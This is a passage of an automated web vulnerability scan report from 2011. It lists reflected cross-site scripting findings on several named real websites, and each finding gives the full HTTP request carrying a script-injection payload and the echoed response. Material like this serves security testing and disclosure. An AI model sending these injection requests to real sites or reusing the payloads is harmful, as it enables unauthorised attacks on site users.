This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themes/chameleon/css/idcCSS.phpfc43a'><script>alert(1)</script>5735b3b8c78?acctid=22911&browser=safari HTTP/1.1 Host: www.intensedebate.com Proxy-Connection: keep-alive Referer: http://www.scmagazineuk.com/microsoft-warns-of-internet-explorer-xss-flaw-in-all-versions-of-windows/article/195310/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: nginx Date: Mon, 31 Jan 2011 17:16:17 GMT Content-Type: text/html; charset=utf-8 Connection: close Vary: Accept-Encoding P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Length: 4748
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conte ...[SNIP]... <script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/themes/chameleon/css/idcCSS.phpfc43a'><script>alert(1)</script>5735b3b8c78?acctid=22911&browser=safari'> ...[SNIP]...
1.275. http://www.intensedebate.com/themes/chameleon/css/idcCSS.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.intensedebate.com
Path:
/themes/chameleon/css/idcCSS.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cd316'><script>alert(1)</script>69b478ffdd7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themes/chameleon/css/idcCSS.php/cd316'><script>alert(1)</script>69b478ffdd7 HTTP/1.1 Host: www.intensedebate.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Date: Mon, 31 Jan 2011 19:48:04 GMT Content-Type: text/html; charset=utf-8 Connection: close Vary: Accept-Encoding P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Length: 4817
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conte ...[SNIP]... <script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/themes/chameleon/css/idcCSS.php/cd316'><script>alert(1)</script>69b478ffdd7'> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 789e9'><script>alert(1)</script>85dc5a2562a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wCSS.php789e9'><script>alert(1)</script>85dc5a2562a?widget=1 HTTP/1.1 Host: www.intensedebate.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Date: Mon, 31 Jan 2011 19:48:04 GMT Content-Type: text/html; charset=utf-8 Connection: close Vary: Accept-Encoding P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Length: 4801
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conte ...[SNIP]... <script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/wCSS.php789e9'><script>alert(1)</script>85dc5a2562a?widget=1'> ...[SNIP]...
1.277. http://www.intensedebate.com/wCSS.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.intensedebate.com
Path:
/wCSS.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 46cb9'><script>alert(1)</script>c2c05cf5f6b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wCSS.php/46cb9'><script>alert(1)</script>c2c05cf5f6b HTTP/1.1 Host: www.intensedebate.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Date: Mon, 31 Jan 2011 19:48:04 GMT Content-Type: text/html; charset=utf-8 Connection: close Vary: Accept-Encoding P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Length: 4788
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conte ...[SNIP]... <script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/wCSS.php/46cb9'><script>alert(1)</script>c2c05cf5f6b'> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 95558'><script>alert(1)</script>e7b8f6dac6f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /widgets95558'><script>alert(1)</script>e7b8f6dac6f/acctComment/22911/5 HTTP/1.1 Host: www.intensedebate.com Proxy-Connection: keep-alive Referer: http://www.scmagazineuk.com/microsoft-warns-of-internet-explorer-xss-flaw-in-all-versions-of-windows/article/195310/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: nginx Date: Mon, 31 Jan 2011 17:16:16 GMT Content-Type: text/html; charset=utf-8 Connection: close Vary: Accept-Encoding P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Length: 4721
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conte ...[SNIP]... <script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/widgets95558'><script>alert(1)</script>e7b8f6dac6f/acctComment/22911/5'> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f237b'><script>alert(1)</script>fc6d197e1bd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /widgets/acctComment/22911f237b'><script>alert(1)</script>fc6d197e1bd/5 HTTP/1.1 Host: www.intensedebate.com Proxy-Connection: keep-alive Referer: http://www.scmagazineuk.com/microsoft-warns-of-internet-explorer-xss-flaw-in-all-versions-of-windows/article/195310/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: nginx Date: Mon, 31 Jan 2011 17:16:16 GMT Content-Type: text/html; charset=utf-8 Connection: close Vary: Accept-Encoding P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Length: 4548
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conte ...[SNIP]... <script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/widgets/acctComment/22911f237b'><script>alert(1)</script>fc6d197e1bd/5'> ...[SNIP]...
1.280. http://www.metacafe.com/fplayer/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.metacafe.com
Path:
/fplayer/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10930"><script>alert(1)</script>2d2f8737db1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /fplayer/?10930"><script>alert(1)</script>2d2f8737db1=1 HTTP/1.1 Host: www.metacafe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: CP="NOI CUR ADM OUR NOR STA NID" Content-Type: text/html Date: Mon, 31 Jan 2011 19:48:50 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: PHPSESSID=7347ca3a3b398ab9162a6261e64237aa; path=/; domain=.metacafe.com Set-Cookie: OAGEO=US%7CTX%7CDallas%7C75207%7C32.7825%7C-96.8207%7C623%7C214%7C%7C%7C; path=/; domain=.metacafe.com Set-Cookie: OAID=78ad65ba0c32312571a1c4541d30a631; expires=Tue, 31-Jan-2012 19:48:50 GMT; path=/; domain=.metacafe.com Set-Cookie: User=%7B%22sc%22%3A1%2C%22visitID%22%3A%2231e27294d7040f6bdcf7fb72e1dfbb3b%22%2C%22LEID%22%3A23%2C%22LangID%22%3A%22en%22%2C%22npUserLocations%22%3A%5B244%5D%2C%22npUserLanguages%22%3A%5B9%5D%2C%22pve%22%3A1%7D; expires=Sat, 30-Jan-2016 19:48:50 GMT; path=/; domain=.metacafe.com Set-Cookie: dsavip=3417313452.20480.0000; expires=Mon, 31-Jan-2011 20:48:50 GMT; path=/ Content-Length: 113548
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo ...[SNIP]... <link rel="alternate" type="application/rss+xml" title="Metacafe - Online Video Entertainment - Free video clips for your enjoyment" href="/fplayer/rss.xml?10930"><script>alert(1)</script>2d2f8737db1=1" /> ...[SNIP]...
1.281. http://www.paloaltonetworks.com/literature/forms/ebook/index.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.paloaltonetworks.com
Path:
/literature/forms/ebook/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8945b"><script>alert(1)</script>8e16c641989 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /literature/forms/ebook/index.php?8945b"><script>alert(1)</script>8e16c641989=1 HTTP/1.1 Host: www.paloaltonetworks.com Proxy-Connection: keep-alive Referer: http://whitepapers.scmagazineuk.com/astaro Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
1.282. http://www.scstudio.tv/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.scstudio.tv
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 492ad"><script>alert(1)</script>3cc772e43c4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?492ad"><script>alert(1)</script>3cc772e43c4=1 HTTP/1.1 Host: www.scstudio.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Mon, 31 Jan 2011 19:59:49 GMT Content-Length: 185 Content-Type: text/html X-Powered-By: Servlet/2.4 JSP/2.0
1.283. http://www.scstudio.tv/favicon.ico [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.scstudio.tv
Path:
/favicon.ico
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c42a3"><script>alert(1)</script>58e8c224440 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /favicon.ico?c42a3"><script>alert(1)</script>58e8c224440=1 HTTP/1.1 Host: www.scstudio.tv Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Mon, 31 Jan 2011 21:17:50 GMT Content-Length: 185 Content-Type: text/html X-Powered-By: Servlet/2.4 JSP/2.0
1.284. http://www.scvision.tv/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.scvision.tv
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf8f1"><script>alert(1)</script>86b592bf9bb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?bf8f1"><script>alert(1)</script>86b592bf9bb=1 HTTP/1.1 Host: www.scvision.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Mon, 31 Jan 2011 19:59:52 GMT Content-Length: 185 Content-Type: text/html X-Powered-By: Servlet/2.4 JSP/2.0
1.285. http://www.scwebcasts.tv/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.scwebcasts.tv
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad1ec"><script>alert(1)</script>ed9539700ba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?ad1ec"><script>alert(1)</script>ed9539700ba=1 HTTP/1.1 Host: www.scwebcasts.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Mon, 31 Jan 2011 19:59:50 GMT Content-Length: 188 Content-Type: text/html X-Powered-By: Servlet/2.4 JSP/2.0
The value of the action request parameter is copied into the HTML document as plain text between tags. The payload aa27e<script>alert(1)</script>e5b239a3869 was submitted in the action parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 85f11"-alert(1)-"96baa1eb807 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news85f11"-alert(1)-"96baa1eb807/stock-alert/forr_veracode-unveils-details-of-webinar-no-more-excuses-end-cross-site-scripting-now--1455558.html/x26amp HTTP/1.1 Host: www.tradingmarkets.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 31 Jan 2011 20:07:50 GMT Server: Apache Set-Cookie: TestCookie=test Cache-Control: max-age=1 Expires: Mon, 31 Jan 2011 20:07:51 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23279
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Online Stock Trading Investing Day Trading | TradingMarkets.com </t ...[SNIP]... rue); pageTracker._setAllowHash(false); pageTracker._link(); pageTracker._linkByPost(); pageTracker._trackPageview("/404.html?page=http://www.tradingmarkets.com/news85f11"-alert(1)-"96baa1eb807/stock-alert/forr_veracode-unveils-details-of-webinar-no-more-excuses-end-cross-site-scripting-now--1455558.html/x26amp&from="); } catch(err) {} </script> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2f54"-alert(1)-"d9931fb932 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/stock-alertc2f54"-alert(1)-"d9931fb932/forr_veracode-unveils-details-of-webinar-no-more-excuses-end-cross-site-scripting-now--1455558.html/x26amp HTTP/1.1 Host: www.tradingmarkets.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 31 Jan 2011 20:07:51 GMT Server: Apache Set-Cookie: TestCookie=test Cache-Control: max-age=1 Expires: Mon, 31 Jan 2011 20:07:52 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23240
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Online Stock Trading Investing Day Trading | TradingMarkets.com </t ...[SNIP]... pageTracker._setAllowHash(false); pageTracker._link(); pageTracker._linkByPost(); pageTracker._trackPageview("/404.html?page=http://www.tradingmarkets.com/news/stock-alertc2f54"-alert(1)-"d9931fb932/forr_veracode-unveils-details-of-webinar-no-more-excuses-end-cross-site-scripting-now--1455558.html/x26amp&from="); } catch(err) {} </script> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 444ee"-alert(1)-"afb478660f1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/stock-alert/forr_veracode-unveils-details-of-webinar-no-more-excuses-end-cross-site-scripting-now--1455558.html444ee"-alert(1)-"afb478660f1/x26amp HTTP/1.1 Host: www.tradingmarkets.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 31 Jan 2011 20:07:52 GMT Server: Apache Set-Cookie: TestCookie=test Cache-Control: max-age=1 Expires: Mon, 31 Jan 2011 20:07:53 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23241
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Online Stock Trading Investing Day Trading | TradingMarkets.com </t ...[SNIP]... pageTracker._trackPageview("/404.html?page=http://www.tradingmarkets.com/news/stock-alert/forr_veracode-unveils-details-of-webinar-no-more-excuses-end-cross-site-scripting-now--1455558.html444ee"-alert(1)-"afb478660f1/x26amp&from="); } catch(err) {} </script> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3c0f8"-alert(1)-"c3413ccd55d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/stock-alert/forr_veracode-unveils-details-of-webinar-no-more-excuses-end-cross-site-scripting-now--1455558.html/x26amp3c0f8"-alert(1)-"c3413ccd55d HTTP/1.1 Host: www.tradingmarkets.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 31 Jan 2011 20:07:53 GMT Server: Apache Set-Cookie: TestCookie=test Cache-Control: max-age=1 Expires: Mon, 31 Jan 2011 20:07:54 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23269
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Online Stock Trading Investing Day Trading | TradingMarkets.com </t ...[SNIP]... pageTracker._trackPageview("/404.html?page=http://www.tradingmarkets.com/news/stock-alert/forr_veracode-unveils-details-of-webinar-no-more-excuses-end-cross-site-scripting-now--1455558.html/x26amp3c0f8"-alert(1)-"c3413ccd55d&from="); } catch(err) {} </script> ...[SNIP]...
1.291. http://www.tradingmarkets.com/news/stock-alert/forr_veracode-unveils-details-of-webinar-no-more-excuses-end-cross-site-scripting-now--1455558.html/x26amp [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60a60"-alert(1)-"89da19402b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/stock-alert/forr_veracode-unveils-details-of-webinar-no-more-excuses-end-cross-site-scripting-now--1455558.html/x26amp?60a60"-alert(1)-"89da19402b=1 HTTP/1.1 Host: www.tradingmarkets.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 31 Jan 2011 20:07:44 GMT Server: Apache Set-Cookie: TestCookie=test Cache-Control: max-age=1 Expires: Mon, 31 Jan 2011 20:07:45 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23243
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Online Stock Trading Investing Day Trading | TradingMarkets.com </t ...[SNIP]... pageTracker._trackPageview("/404.html?page=http://www.tradingmarkets.com/news/stock-alert/forr_veracode-unveils-details-of-webinar-no-more-excuses-end-cross-site-scripting-now--1455558.html/x26amp?60a60"-alert(1)-"89da19402b=1&from="); } catch(err) {} </script> ...[SNIP]...
The value of the rct\\x3dj\\x26amp;sa\\x3dX\\x26amp;ei\\x3dteNGTZzQLsb_lged9pk8\\x26amp;ved\\x3d0CC4Q-AsoATAA\\x26amp;q\\x3dcross+site+scripting\\x26amp;usg\\x3dAFQjCNHA8oKYn9FF9KIbtgEvk7ET4aEESg\\x22 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c39cc"-alert(1)-"dd4c962d003 was submitted in the rct\\x3dj\\x26amp;sa\\x3dX\\x26amp;ei\\x3dteNGTZzQLsb_lged9pk8\\x26amp;ved\\x3d0CC4Q-AsoATAA\\x26amp;q\\x3dcross+site+scripting\\x26amp;usg\\x3dAFQjCNHA8oKYn9FF9KIbtgEvk7ET4aEESg\\x22 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/stock-alert/forr_veracode-unveils-details-of-webinar-no-more-excuses-end-cross-site-scripting-now--1455558.html/x26amp;rct\\x3dj\\x26amp;sa\\x3dX\\x26amp;ei\\x3dteNGTZzQLsb_lged9pk8\\x26amp;ved\\x3d0CC4Q-AsoATAA\\x26amp;q\\x3dcross+site+scripting\\x26amp;usg\\x3dAFQjCNHA8oKYn9FF9KIbtgEvk7ET4aEESg\\x22c39cc"-alert(1)-"dd4c962d003 HTTP/1.1 Host: www.tradingmarkets.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 31 Jan 2011 20:07:45 GMT Server: Apache Set-Cookie: TestCookie=test Cache-Control: max-age=1 Expires: Mon, 31 Jan 2011 20:07:46 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23446
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Online Stock Trading Investing Day Trading | TradingMarkets.com </t ...[SNIP]... 55558.html/x26amp;rct\\x3dj\\x26amp;sa\\x3dX\\x26amp;ei\\x3dteNGTZzQLsb_lged9pk8\\x26amp;ved\\x3d0CC4Q-AsoATAA\\x26amp;q\\x3dcross+site+scripting\\x26amp;usg\\x3dAFQjCNHA8oKYn9FF9KIbtgEvk7ET4aEESg\\x22c39cc"-alert(1)-"dd4c962d003&from="); } catch(err) {} </script> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c4172"-alert(1)-"4c95e7bfff4 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /c/a/Security/Social-Media-Applications-a-Threat-to-Businesses-Report-707207/x22 HTTP/1.1 Host: www.channelinsider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=c4172"-alert(1)-"4c95e7bfff4
Response (redirected)
HTTP/1.1 404 Not Found Server: nginx/0.7.65 Date: Mon, 31 Jan 2011 19:28:52 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.1.6 Content-Length: 3824
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c06c0"-alert(1)-"9b7cacd62d8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /subscriptions/ HTTP/1.1 Host: www.haymarketbusinesssubs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=c06c0"-alert(1)-"9b7cacd62d8
Response
